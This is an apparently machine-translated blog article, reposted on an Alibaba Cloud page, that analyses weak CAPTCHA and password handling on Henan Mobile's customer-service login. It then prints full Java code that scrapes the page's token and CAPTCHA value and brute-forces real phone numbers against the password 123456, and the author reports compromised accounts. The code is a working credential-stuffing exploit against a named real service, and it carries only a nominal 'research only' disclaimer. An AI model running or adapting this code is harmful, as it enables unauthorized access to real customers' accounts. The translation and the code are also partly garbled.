Analysis on the flaw of the verification Code of the customer service system in Henan Mobile network and the exploit of!_ vulnerability

Source: Internet
Author: User
Tags rand readline stringbuffer
First of all, there is no technical content in this article---just to prove that Java can also be used as a crack tool

China Mobile Online Customer service system we should be very familiar with, because I am the mobile faithful Henan users, naturally from the Henan Mobile said. Users who have worked in the mobile lobby are well aware that the user's password can only be set to 6 digits 0~9. While the online service system and mobile core database are synchronized, the password can only be limited to 6 digits. Such a simple combination of passwords is ideal for brute force cracking.
Let's analyze the feasibility of brute force cracking. First of all, the system to log on the number of times to have no restrictions, I randomly enter a mobile phone number of test system fault tolerance. I've tried it 10 times and still have access to the login interface (yes~). Next, analyze the key fields that the system login needs to commit. Take a look at the login page http://khfw.ha.chinamobile.com/new_wskf/login/login_portal.jsp
__________________________________________
.....................
<form method= "POST" name= "Thisform"
Post method submit data
...........
action= "/servlet/com.huawei.icd30.wskf.login.logincheck" >-->
The servlet that handles the logon event appears to be the parameter it receives.
<input type= "hidden" name= "Forwardflag" value= "0" >
Key fields Forwardflag do not know what is useful, but refresh the page multiple times without change
<input type= "hidden" name= "Transaction" value= "3" >
Key fields Transaction ditto
<input type= "hidden" name= "Ssrandompass" value= "dnzjn/vfr4hwmacdvqhncq==" >
Key fields Ssrandompass Each refresh gets a new random value that is not displayed on the page
Could be an implied message of identity.
......................
The following is a user-submitted form content
<td><input type= "text" name= "UserName" size= "14"
Oh, mobile phone number
<td><input type= "password" name= "password"
Phone password
<td><input name= "Randompassword" type= "text"
Picture Verification Code
.......................................
___________________________________


The post content of the comprehensive is: forwardflag=0&transaction=3&ssrandompassdnzjn/vfr4hwmacdvqhncq==
&username=135********&password=******&randompassword=****

Password is the content we want to guess, how to lock the Randompassword (CAPTCHA) is the key. The specific is how to parse the image verification code. In this case, it is necessary to mention that in the age of no verification code, many violent cracking software is very popular, for the intrusion of most mail servers and forums is a very effective way. Also hold red a batch of classic crack software, such as streamer, tracing snow. (hehe, are all treasures worth collecting)
Let's take a look at how the CAPTCHA code is generated right click on the Captcha picture. Haha, what do we see? http://khfw.ha.chinamobile.com/s ... let?randompass=9814<--this is not exactly our verification code value?
We visited the Com.huawei.icd30.wskf.console.ImageServlet application to change the Randompass value of 1111 hehe, as expected, generated a value of 1111 of the picture. This shows that the Login verifier and verification code generation is two applications. Request Com.huawei.icd30.wskf.console.ImageServlet to generate the CAPTCHA by the returned login page pass parameter.

Here our analysis work is done. How to use the program to achieve violent cracking is not technically difficult. I wrote a Java version of the application Win2000 under the success of the test, imitate some QQ crack mode, the password is 123456, constantly transform guess solution cell phone number, 10 minutes to find a password of 123456 users.


This code only does research, regarding this procedure may cause the consequence oneself not to be responsible for ********


The source code is as follows:
--------------



Import java.net.*;
Import java.io.*;

public class Result
{

public static String Ssrandompass,randompassword;
public static int password=123456,num=00000;
Set six-digit phone password and five-digit phone number

public static void Main (String args[]) {

while (true)
{
Check ();
This function captures the key field of the login page

try {
URL url = new URL ("Http://khfw.ha.chinamobile.com/servlet/com.huawei.icd30.wskf.login.LoginCheck");;
URLConnection connection = Url.openconnection ();
Connection.setdooutput (TRUE);

OutputStreamWriter out = new OutputStreamWriter (Connection.getoutputstream (), "8859_1");

Out.write ("forwardflag=0&transaction=3&ssrandompass=" +ssrandompass+) &username=
135286 "+num+" & "+" password= "+password+" &randompassword= "+randompassword); Organization Submit information
Out.flush ();
Out.close ();
Get Return Data

BufferedReader in = new BufferedReader (New InputStreamReader (Connection.getinputstream ()));
String line = null;
StringBuffer content= new StringBuffer ();
while (line = In.readline ())!= null)

{
Line is the return value, which can be used to determine whether the success,

Content.append (line);
}

In.close ();
In=null;
Url=null;
String msg = content.tostring ();

System.err.println ("Back Code:" +msg.length () + "Check passwd:" +password);
System.err.println ("Check num:135256" +num);
if (Msg.length () ==412|num==99999)
{
System.err.println ("Get one PhoneNumber");
SYSTEM.ERR.PRINTLN (msg);
Break
}
password++;
num++;

catch (Malformedurlexception e) {
TODO auto-generated Catch block
E.printstacktrace ();
catch (Unsupportedencodingexception e) {
TODO auto-generated Catch block
E.printstacktrace ();
catch (IOException e) {
TODO auto-generated Catch block
E.printstacktrace ();
}

}
}

public static void Check ()
{
StringBuffer SsR = new StringBuffer ();
StringBuffer rand = new StringBuffer ();
try {
URL url = new URL ("http://khfw.ha.chinamobile.com/new_wskf/login/login_portal.jsp");
URLConnection connection = Url.openconnection ();
Connection.setdooutput (TRUE);

OutputStreamWriter out = new OutputStreamWriter (Connection.getoutputstream (), "8859_1");
Out.write ("?");
Out.flush ();
Out.close ();
Get Return Data

BufferedReader in = new BufferedReader (New InputStreamReader (Connection.getinputstream ()));
String line = null;
StringBuffer content= new StringBuffer ();
while (line = In.readline ())!= null)

{
Line is the return value, which can be used to determine whether the success,
Content.append (line);
}

In.close ();
In=null;
Url=null;
String msg = content.tostring ();

for (int i=0;i<=23;i++)
Ssr.append (Msg.charat (1534+i));
Ssrandompass=ssr.tostring ();
System.err.println (Ssr.tostring ());

for (int i=0;i<=3;i++)
Rand.append (Msg.charat (2492+i));
Randompassword=rand.tostring ();
System.err.println (Rand.tostring ());


SYSTEM.ERR.PRINTLN (msg);
catch (Malformedurlexception e) {
TODO auto-generated Catch block
E.printstacktrace ();
catch (Unsupportedencodingexception e) {
TODO auto-generated Catch block
E.printstacktrace ();
catch (IOException e) {
TODO auto-generated Catch block
E.printstacktrace ();
}

}

}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.